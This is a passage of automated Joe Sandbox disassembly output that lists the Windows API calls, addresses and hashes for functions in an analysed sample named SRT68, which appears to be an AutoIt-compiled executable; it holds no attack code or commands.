                                                                      • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                      • String ID:
                                                                      • API String ID: 1827037458-0
                                                                      • Opcode ID: 794a652c1be4eed9cac80c5b53a398f3ef37c4e389cfc5193763259cf423001a
                                                                      • Instruction ID: bd06df03ad9cf034f39e0041626ebb03ccd7d32214b402324ea3705535a54606
                                                                      • Opcode Fuzzy Hash: 794a652c1be4eed9cac80c5b53a398f3ef37c4e389cfc5193763259cf423001a
                                                                      • Instruction Fuzzy Hash: 7D41C1715043019FC720DF24CC84FBA7BF8FB4A764F180629F9A4872A1C7399805EB61
                                                                      APIs
                                                                      • ShowWindow.USER32(010657B0,00000000,015855C0,?,?,010657B0,?,0102B5A8,?,?), ref: 0102B712
                                                                      • EnableWindow.USER32(00000000,00000000), ref: 0102B736
                                                                      • ShowWindow.USER32(010657B0,00000000,015855C0,?,?,010657B0,?,0102B5A8,?,?), ref: 0102B796
                                                                      • ShowWindow.USER32(00000000,00000004,?,0102B5A8,?,?), ref: 0102B7A8
                                                                      • EnableWindow.USER32(00000000,00000001), ref: 0102B7CC
                                                                      • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0102B7EF
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Show$Enable$MessageSend
                                                                      • String ID:
                                                                      • API String ID: 642888154-0
                                                                      • Opcode ID: 95555a5a9efc835106de393f430c87748b130c29fc45457202f527326cb95fbe
                                                                      • Instruction ID: 9b73f1eebfcba89b60b9f78737948f5b889fbb004f8dc973f2bb7ebdc31a214d
                                                                      • Opcode Fuzzy Hash: 95555a5a9efc835106de393f430c87748b130c29fc45457202f527326cb95fbe
                                                                      • Instruction Fuzzy Hash: 33414D34600251AFEB66CF28C499B957FE1FF09350F1C41E9EAC88F6A2C732A456DB51
                                                                      APIs
                                                                      • GetForegroundWindow.USER32(?,?,?,?,?,?,01014E41,?,?,00000000,00000001), ref: 010170AC
                                                                        • Part of subcall function 010139A0: GetWindowRect.USER32(?,?), ref: 010139B3
                                                                      • GetDesktopWindow.USER32 ref: 010170D6
                                                                      • GetWindowRect.USER32(00000000), ref: 010170DD
                                                                      • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0101710F
                                                                        • Part of subcall function 01005244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 010052BC
                                                                      • GetCursorPos.USER32(?), ref: 0101713B
                                                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 01017199
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                      • String ID:
                                                                      • API String ID: 4137160315-0
                                                                      • Opcode ID: e16013cae6069d576a07c69fee24e3673d641b8acdcdb44ce3409e324d66c642
                                                                      • Instruction ID: 1888481d57e5138fbc74211255dcb0563f793fced078e0d644b18e1b5405e671
                                                                      • Opcode Fuzzy Hash: e16013cae6069d576a07c69fee24e3673d641b8acdcdb44ce3409e324d66c642
                                                                      • Instruction Fuzzy Hash: 1131B072505316ABD730DF18C848F9BBBEAFF88354F100919F5C597181CA79EA09CB92
                                                                      APIs
                                                                        • Part of subcall function 00FF80A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00FF80C0
                                                                        • Part of subcall function 00FF80A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00FF80CA
                                                                        • Part of subcall function 00FF80A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00FF80D9
                                                                        • Part of subcall function 00FF80A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00FF80E0
                                                                        • Part of subcall function 00FF80A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00FF80F6
                                                                      • GetLengthSid.ADVAPI32(?,00000000,00FF842F), ref: 00FF88CA
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00FF88D6
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00FF88DD
                                                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 00FF88F6
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,00FF842F), ref: 00FF890A
                                                                      • HeapFree.KERNEL32(00000000), ref: 00FF8911
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                      • String ID:
                                                                      • API String ID: 3008561057-0
                                                                      • Opcode ID: b90454d8b28ffd421c8faf405c634680127f5ac2c31fb4ef693e7385a11f7fce
                                                                      • Instruction ID: 3e7e1e884d5ba6b9d2b39a2f3e5f6e277a0c203ad6e8e5b40aef79066b1a751f
                                                                      • Opcode Fuzzy Hash: b90454d8b28ffd421c8faf405c634680127f5ac2c31fb4ef693e7385a11f7fce
                                                                      • Instruction Fuzzy Hash: CD11A231901209FFDB309FA4DC0ABBE7B78EF457A1F604018E98597210CB769901EB60
                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00FF85E2
                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00FF85E9
                                                                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00FF85F8
                                                                      • CloseHandle.KERNEL32(00000004), ref: 00FF8603
                                                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00FF8632
                                                                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 00FF8646
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                      • String ID:
                                                                      • API String ID: 1413079979-0
                                                                      • Opcode ID: 0885bbbee9b3f22e1265910e694688765747b4d921b0119ad2bb1768b551a65a
                                                                      • Instruction ID: 1bca48068c8acd8246d98ca295b13a60b1801450f311f5be292fe41d5d36a248
                                                                      • Opcode Fuzzy Hash: 0885bbbee9b3f22e1265910e694688765747b4d921b0119ad2bb1768b551a65a
                                                                      • Instruction Fuzzy Hash: 0F11597250024EABDF218EA4DD49FEE7BB9EF08794F184055FE05E2160C7768D61EB60
                                                                      APIs
                                                                      • GetDC.USER32(00000000), ref: 00FFB7B5
                                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 00FFB7C6
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00FFB7CD
                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00FFB7D5
                                                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00FFB7EC
                                                                      • MulDiv.KERNEL32(000009EC,?,?), ref: 00FFB7FE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: CapsDevice$Release
                                                                      • String ID:
                                                                      • API String ID: 1035833867-0
                                                                      • Opcode ID: 47a237ed46cb191c96f9c73eb2b3276d3f425f45cf5c5959b1d89ffb8c46d0db
                                                                      • Instruction ID: e228ca047a89fa307a799a8bddaa7445c89593c26b1f5f493b2cae0d9e27ca00
                                                                      • Opcode Fuzzy Hash: 47a237ed46cb191c96f9c73eb2b3276d3f425f45cf5c5959b1d89ffb8c46d0db
                                                                      • Instruction Fuzzy Hash: B2017175E00209BBEB20AFB69D49A5ABFB8EF48361F104065FA04A7291D6359C00CF90
                                                                      APIs
                                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FC0193
                                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 00FC019B
                                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FC01A6
                                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FC01B1
                                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00FC01B9
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FC01C1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual
                                                                      • String ID:
                                                                      • API String ID: 4278518827-0
                                                                      • Opcode ID: 708bfeaebe1d1ffc257d07613c75286e03c050181c5a4d7259cd2fad441ee9b5
                                                                      • Instruction ID: 57e22c956061d07f80c418e64a8e773f935cfcc353254db86e6c6b6c55b79677
                                                                      • Opcode Fuzzy Hash: 708bfeaebe1d1ffc257d07613c75286e03c050181c5a4d7259cd2fad441ee9b5
                                                                      • Instruction Fuzzy Hash: E90148B090275A7DE3108F6A8C85A52FEA8FF19394F00411BA15847941C7B5A868CBE5
                                                                      APIs
                                                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 010053F9
                                                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0100540F
                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 0100541E
                                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0100542D
                                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 01005437
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0100543E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                      • String ID:
                                                                      • API String ID: 839392675-0
                                                                      • Opcode ID: 1159ea1bdc14368a5da6ee717ebde71af6b96b62d4d2808a0c2d6825920a2302
                                                                      • Instruction ID: 292ed7cb422bd956d4e581eae71df40da1f8486edaa14c60ded6d4c1977e6565
                                                                      • Opcode Fuzzy Hash: 1159ea1bdc14368a5da6ee717ebde71af6b96b62d4d2808a0c2d6825920a2302
                                                                      • Instruction Fuzzy Hash: B9F06D32240159BBE7315EA29C0EEEB7A7CEBCAB51F100159FA44D1081DAAA1A0187B5
                                                                      APIs
                                                                      • InterlockedExchange.KERNEL32(?,?), ref: 01007243
                                                                      • EnterCriticalSection.KERNEL32(?,?,00FB0EE4,?,?), ref: 01007254
                                                                      • TerminateThread.KERNEL32(00000000,000001F6,?,00FB0EE4,?,?), ref: 01007261
                                                                      • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00FB0EE4,?,?), ref: 0100726E
                                                                        • Part of subcall function 01006C35: CloseHandle.KERNEL32(00000000,?,0100727B,?,00FB0EE4,?,?), ref: 01006C3F
                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 01007281
                                                                      • LeaveCriticalSection.KERNEL32(?,?,00FB0EE4,?,?), ref: 01007288
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                      • String ID:
                                                                      • API String ID: 3495660284-0
                                                                      • Opcode ID: e816db8170c35e4fae9d309af9e8c2daddc841bd4bed9cd76b9853921df3a51f
                                                                      • Instruction ID: 2f01443e139eb11c335f00e6fcd91c2b07385498c8101699587fe8e1ee24ce96
                                                                      • Opcode Fuzzy Hash: e816db8170c35e4fae9d309af9e8c2daddc841bd4bed9cd76b9853921df3a51f
                                                                      • Instruction Fuzzy Hash: 9AF09A36441213ABE7722F24EE4C9EA7B3AEF07342F200121F28290098CB7B1404CB50
                                                                      APIs
                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00FF899D
                                                                      • UnloadUserProfile.USERENV(?,?), ref: 00FF89A9
                                                                      • CloseHandle.KERNEL32(?), ref: 00FF89B2
                                                                      • CloseHandle.KERNEL32(?), ref: 00FF89BA
                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00FF89C3
                                                                      • HeapFree.KERNEL32(00000000), ref: 00FF89CA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                      • String ID:
                                                                      • API String ID: 146765662-0
                                                                      • Opcode ID: 4a0339f0c44bac58b0506a50babd2375ec10fe801747be7a82df39684bf9b689
                                                                      • Instruction ID: 2e6ba555572b31135730851b36a46976c0084085315d072ab6684b7c2a9985a1
                                                                      • Opcode Fuzzy Hash: 4a0339f0c44bac58b0506a50babd2375ec10fe801747be7a82df39684bf9b689
                                                                      • Instruction Fuzzy Hash: 6CE0C936004002BBD6212FE1ED0C915BB79FB893A27B08220F255C1068CB375420DB50
                                                                      APIs
                                                                      • VariantInit.OLEAUT32(?), ref: 01018613
                                                                      • CharUpperBuffW.USER32(?,?), ref: 01018722
                                                                      • VariantClear.OLEAUT32(?), ref: 0101889A
                                                                        • Part of subcall function 01007562: VariantInit.OLEAUT32(00000000), ref: 010075A2
                                                                        • Part of subcall function 01007562: VariantCopy.OLEAUT32(00000000,?), ref: 010075AB
                                                                        • Part of subcall function 01007562: VariantClear.OLEAUT32(00000000), ref: 010075B7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                      • API String ID: 4237274167-1221869570
                                                                      • Opcode ID: ee13d1b14200b203fce039a17e4ea4eb856bb93079c6dc6ec3bb3b925cbd404c
                                                                      • Instruction ID: 24d72ea266a33fca6477071b0c6e46e5bab84c2869f27ccec5b478ee3abd7f84
                                                                      • Opcode Fuzzy Hash: ee13d1b14200b203fce039a17e4ea4eb856bb93079c6dc6ec3bb3b925cbd404c
                                                                      • Instruction Fuzzy Hash: 59916D716083019FC710DF24C88495BBBF4EF89754F04896EF99A8B365DB39EA05CB92
                                                                      APIs
                                                                        • Part of subcall function 00FBFC86: _wcscpy.LIBCMT ref: 00FBFCA9
                                                                      • _memset.LIBCMT ref: 01002B87
                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 01002BB6
                                                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 01002C69
                                                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 01002C97
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                      • String ID: 0
                                                                      • API String ID: 4152858687-4108050209
                                                                      • Opcode ID: e6835d11410a0ecfd9f08c9844e758be8ed60e3830008c1f9cd82ddbaaf99f03
                                                                      • Instruction ID: 72f41bb81f7ac7fe784808763486699913188921cec4575ed96af97a786c4fef
                                                                      • Opcode Fuzzy Hash: e6835d11410a0ecfd9f08c9844e758be8ed60e3830008c1f9cd82ddbaaf99f03
                                                                      • Instruction Fuzzy Hash: B851DC712083059EF7A6DEA8C849A6BBBE8EF89350F040A6DF9C5D21D1DB74C9448B52
                                                                      APIs
                                                                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00FFD5D4
                                                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00FFD60A
                                                                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00FFD61B
                                                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00FFD69D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                                                      • String ID: DllGetClassObject
                                                                      • API String ID: 753597075-1075368562
                                                                      • Opcode ID: 20ca1c8114f6ed86f773168e3f27c4216f0d53dbf0f1b5f8989a70a26b93056a
                                                                      • Instruction ID: f80ea59fa7337ee73b5e1b127919b757058d0cb2df356e0ac48e131490d56142
                                                                      • Opcode Fuzzy Hash: 20ca1c8114f6ed86f773168e3f27c4216f0d53dbf0f1b5f8989a70a26b93056a
                                                                      • Instruction Fuzzy Hash: 6041AFB2600208EFDB15DF54C884AAA7BBAEF44314F1581A9EE09DF215D7B5DD40EBA0
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 010027C0
                                                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 010027DC
                                                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 01002822
                                                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,01065890,00000000), ref: 0100286B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$Delete$InfoItem_memset
                                                                      • String ID: 0
                                                                      • API String ID: 1173514356-4108050209
                                                                      • Opcode ID: fd6ade41b4dd2dc4169f7fb44fc69997826d1a8d662f7ebc520d3f4ac338190f
                                                                      • Instruction ID: b3c4892e15a426062dd68bf85ceaf1da34a80186edc88f3cb744dc4126d3a9c9
                                                                      • Opcode Fuzzy Hash: fd6ade41b4dd2dc4169f7fb44fc69997826d1a8d662f7ebc520d3f4ac338190f
                                                                      • Instruction Fuzzy Hash: D341A0752053029FE722DF28C848F6ABBE8EF85314F14496DFAA5972D1D730A605CB52
                                                                      APIs
                                                                      • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0101D7C5
                                                                        • Part of subcall function 00FA784B: _memmove.LIBCMT ref: 00FA7899
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharLower_memmove
                                                                      • String ID: cdecl$none$stdcall$winapi
                                                                      • API String ID: 3425801089-567219261
                                                                      • Opcode ID: 0efdfa7bfcfe5dce731399431e5e08e45ef2eed2301f3338ff976396fdca60b2
                                                                      • Instruction ID: b74dec7a65c5d567807b07eb9b7f6a17c4723a6735c71ca2feeeb132c801e533
                                                                      • Opcode Fuzzy Hash: 0efdfa7bfcfe5dce731399431e5e08e45ef2eed2301f3338ff976396fdca60b2
                                                                      • Instruction Fuzzy Hash: 0B31B07190420AEBCF00EF98CC559EEB3B5FF05320B008659E8A9976D5DB39E905CB80
                                                                      APIs
                                                                        • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
                                                                        • Part of subcall function 00FFAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00FFAABC
                                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00FF8F14
                                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00FF8F27
                                                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 00FF8F57
                                                                        • Part of subcall function 00FA7BCC: _memmove.LIBCMT ref: 00FA7C06
